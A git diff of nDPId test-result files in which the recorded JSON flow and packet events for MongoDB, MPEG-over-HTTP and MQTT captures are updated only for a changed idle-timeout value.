-00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1483814916005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483814916005,"pkt":"LGv11hfFABsXAAIwgQABLAgARQAAQILYQAA\/BvoMCgoKEgoKChP8NnUwNO8EYwAAAACwAv\/\/CB0AAAIEBVABAwMFAQEICh4cp5sAAAAABAIAAA=="} 
-00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1483814916005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483814916005,"pkt":"LGv11hfFLGv11hfMgQAAMggARQAAQILYQAA+BvsMCgoKEgoKChP8NnUwNO8EYwAAAACwAv\/\/CB0AAAIEBVABAwMFAQEICh4cp5sAAAAABAIAAA=="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1483814916098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483814916098,"pkt":"LGv11hfMLGv11hfFgQAAMggARQAAPAAAQAA9Bn7pCgoKEwoKChJ1MPw2EZaBKjTvBGSgEjiQwtwAAAIEBbQEAggKUsc3tB4cp5sBAwMJ"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 
-00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483814916005,"flow_last_seen":1483814916005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483814916005,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1483814916005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483814916005,"pkt":"LGv11hfFABsXAAIwgQABLAgARQAAQILYQAA\/BvoMCgoKEgoKChP8NnUwNO8EYwAAAACwAv\/\/CB0AAAIEBVABAwMFAQEICh4cp5sAAAAABAIAAA=="} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1483814916005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483814916005,"pkt":"LGv11hfFLGv11hfMgQAAMggARQAAQILYQAA+BvsMCgoKEgoKChP8NnUwNO8EYwAAAACwAv\/\/CB0AAAIEBVABAwMFAQEICh4cp5sAAAAABAIAAA=="} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1483814916098,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483814916098,"pkt":"LGv11hfMLGv11hfFgQAAMggARQAAPAAAQAA9Bn7pCgoKEwoKChJ1MPw2EZaBKjTvBGSgEjiQwtwAAAIEBbQEAggKUsc3tB4cp5sBAwMJ"} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1483814916005,"flow_last_seen":1483814916108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":73,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.18","dst_ip":"10.10.10.19","src_port":64566,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1483737232974,"flow_last_seen":1483737232979,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1483814916108,"l3_proto":"ip4","src_ip":"10.10.10.16","dst_ip":"10.10.10.17","src_port":51358,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":27,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":27,"packets-processed":27,"total-skipped-flows":0,"total-l4-data-len":706,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":37,"global_ts_msec":1483814916108} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 27/27 diff --git a/test/results/mpeg.pcap.out b/test/results/mpeg.pcap.out index 490046696..e988c5725 100644 --- a/test/results/mpeg.pcap.out +++ b/test/results/mpeg.pcap.out 
@@ -1,12 +1,12 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"mpeg.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mpeg.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1434379491040} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1434379491040,"flow_last_seen":1434379491040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1434379491040,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434379491040,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1434379491040,"pkt":"yGyHABajPBXCt3IOCABFAABAOE9AAEAGJUTAqFCgLmWdd9n8AFBP68YoAAAAALAC\/\/\/OTgAAAgQFtAEDAwUBAQgKFSiGAAAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434379491117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1434379491117,"pkt":"PBXCt3IOyGyHABajCABFAAA8AABAADIGa5cuZZ13wKhQoABQ2fyPIjpcT+vGKaAScSAIFwAAAgQFqAQCCAoAu5vaFSiGAAEDAwhf8g=="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434379491117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1434379491117,"pkt":"yGyHABajPBXCt3IOCABFAAA02wVAAEAGgpnAqFCgLmWdd9n8AFBP68YpjyI6XYAQECCXiwAAAQEIChUohk0Au5va"} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1434379491040,"flow_last_seen":1434379491117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1434379491117,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Network"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":0,"content_type":"","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1434379491040,"flow_last_seen":1434379491158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1434379491158,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":200,"content_type":"audio\/mpeg","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1434379491040,"flow_last_seen":1434379491221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":9363,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1434379491221,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"}} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1434379491040,"flow_last_seen":1434379491040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1434379491040,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1434379491040,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1434379491040,"pkt":"yGyHABajPBXCt3IOCABFAABAOE9AAEAGJUTAqFCgLmWdd9n8AFBP68YoAAAAALAC\/\/\/OTgAAAgQFtAEDAwUBAQgKFSiGAAAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434379491117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1434379491117,"pkt":"PBXCt3IOyGyHABajCABFAAA8AABAADIGa5cuZZ13wKhQoABQ2fyPIjpcT+vGKaAScSAIFwAAAgQFqAQCCAoAu5vaFSiGAAEDAwhf8g=="} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434379491117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1434379491117,"pkt":"yGyHABajPBXCt3IOCABFAAA02wVAAEAGgpnAqFCgLmWdd9n8AFBP68YpjyI6XYAQECCXiwAAAQEIChUohk0Au5va"} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1434379491040,"flow_last_seen":1434379491117,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1434379491117,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Network"},"http": {"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":0,"content_type":"","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1434379491040,"flow_last_seen":1434379491158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1434379491158,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"},"http": 
{"hostname":"luca.ntop.org","url":"luca.ntop.org\/0.mp3","code":200,"content_type":"audio\/mpeg","user_agent":"Wget\/1.16.3 (darwin14.1.0)"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":19,"source":"mpeg.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1434379491040,"flow_last_seen":1434379491221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":9363,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1434379491221,"l3_proto":"ip4","src_ip":"192.168.80.160","dst_ip":"46.101.157.119","src_port":55804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.ntop","breed":"Safe","category":"Media"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":19,"source":"mpeg.pcap","alias":"nDPId-test","packets-captured":19,"packets-processed":19,"total-skipped-flows":0,"total-l4-data-len":9363,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1434379491221} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 19/19 diff --git a/test/results/mqtt.pcap.out b/test/results/mqtt.pcap.out index 7f7c46555..7e707a17d 100644 --- a/test/results/mqtt.pcap.out +++ b/test/results/mqtt.pcap.out 
@@ -1,15 +1,15 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"mqtt.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1643014009283} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014009283,"flow_last_seen":1643014009283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643014009283,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643014009283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1643014009283,"pkt":"AAAAAAAAAAwATSywCABFAAA8AABAADQGcggKCgoBwKgAAQdbo6QZpJjZwwPwU6AS\/oijvAAAAgQFtAQCCArcK3DSu1+3wwEDAwc="} -00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643014009286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":132,"pkt_l4_len":98,"thread_ts_msec":1643014009286,"pkt":"AAAAAAAAAAwATSywCABFAAB2fFxAAD8G6nHAqAABCgoKAaOkB1vDA\/BTGaSY2oAYAOXxcQAAAQEICrtfuBTcK3DSEEAABk1RSXNkcAPCABQAFmNiYWFiY2JhYmFjYmJiYmJhYWFhYWIADDAyRDUwNTAyMjNEMwAMMDJENTA1MDIyM0Qz"} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643014009283,"flow_last_seen":1643014009286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1643014009286,"l3_proto":"ip4","src_ip":"10.10.10.1","dst_ip":"192.168.0.1","src_port":1883,"dst_port":41892,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
-00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643014009367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1643014009367,"pkt":"AAAAAAAAAAwATSywCABFAABUfF1AAD8G6pLAqAABCgoKAaOkB1vDA\/CVGaSY2oAYAOUsbgAAAQEICrtfuGXcK3Ejgh4AAQAZYXN0ci9zNzIwLzAyRDUwNTAyMjNEMy85OQA="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643014349216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":355,"pkt_l4_len":317,"thread_ts_msec":1643014349216,"pkt":"AAAAAAAAAAIAAAAIgQAD8AgARQABUdTzQABABowKZEMj7jOJHO+I2wdbWSC31VrTd7uAGAGz9SgAAAEBCAoAXWNEhxKKyRCaAgAETVFUVATAAlgAEFA0Nzc3NUlEMTcwVzIxMjAASmlvdGF6ZXdwbWxpdGh1Yi5henVyZS1kZXZpY2VzLm5ldC9QNDc3NzVJRDE3MFcyMTIwLz9hcGktdmVyc2lvbj0yMDE4LTA2LTMwALBTaGFyZWRBY2Nlc3NTaWduYXR1cmUgc2lnPUtVNFVpQlRmV2UlMkZ4cyUyQmdURzVXUURMdnpyUHg0VTYySFRwU2xma2Z4cmZRJTNEJnNlPTE2NDMwMTc5NDcmc3I9aW90YXpld3BtbGl0aHViLmF6dXJlLWRldmljZXMubmV0JTJGUDQ3Nzc1SUQxNzBXMjEyMCUyRiUzRmFwaS12ZXJzaW9uJTNEMjAxOC0wNi0zMA=="} 
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"mqtt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643014349216,"flow_last_seen":1643014349216,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":1643014349216,"l3_proto":"ip4","src_ip":"100.67.35.238","dst_ip":"51.137.28.239","src_port":35035,"dst_port":1883,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 